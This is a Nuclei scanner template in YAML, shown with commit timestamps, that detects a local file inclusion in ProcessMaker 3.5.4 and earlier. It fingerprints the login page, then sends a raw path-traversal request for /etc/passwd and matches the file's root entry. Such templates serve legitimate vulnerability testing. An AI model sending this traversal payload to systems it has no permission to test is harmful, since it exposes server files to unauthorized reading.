nuclei-templates/http/vulnerabilities/other/processmaker-lfi.yaml

51 lines
1.1 KiB
YAML
Raw Normal View History

2021-08-31 08:33:47 +00:00
id: processmaker-lfi
info:
name: ProcessMaker <=3.5.4 - Local File Inclusion
2021-08-31 08:33:47 +00:00
author: KrE80r
severity: high
description: ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion.
2021-08-31 08:33:47 +00:00
reference:
- https://www.exploit-db.com/exploits/50229
2021-08-31 08:38:11 +00:00
- https://www.processmaker.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 2
2023-10-14 11:27:55 +00:00
tags: processmaker,lfi,edb
2021-08-31 08:33:47 +00:00
http:
2023-11-06 11:14:30 +00:00
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: body
words:
- "ProcessMaker"
- "processmaker_login.png"
condition: and
2021-08-31 08:33:47 +00:00
- raw:
- |
GET /../../../..//etc/passwd HTTP/1.1
Host: {{Hostname}}
2023-11-06 11:14:30 +00:00
unsafe: true
2021-08-31 08:33:47 +00:00
matchers-condition: and
matchers:
- type: regex
2023-11-06 11:14:30 +00:00
part: body
2021-08-31 08:33:47 +00:00
regex:
- "root:.*:0:0:"
2021-08-31 08:33:47 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502205881b06ab3cf04ca7f9a3d37c064c364a411ddea6a2db693857ca2e104a761f50221009b673896ede24406cb4290e2ddf260ca6e943b1d5dfa1fa8273015cfd15089bc:922c64590222798bb761d5b6d8e72950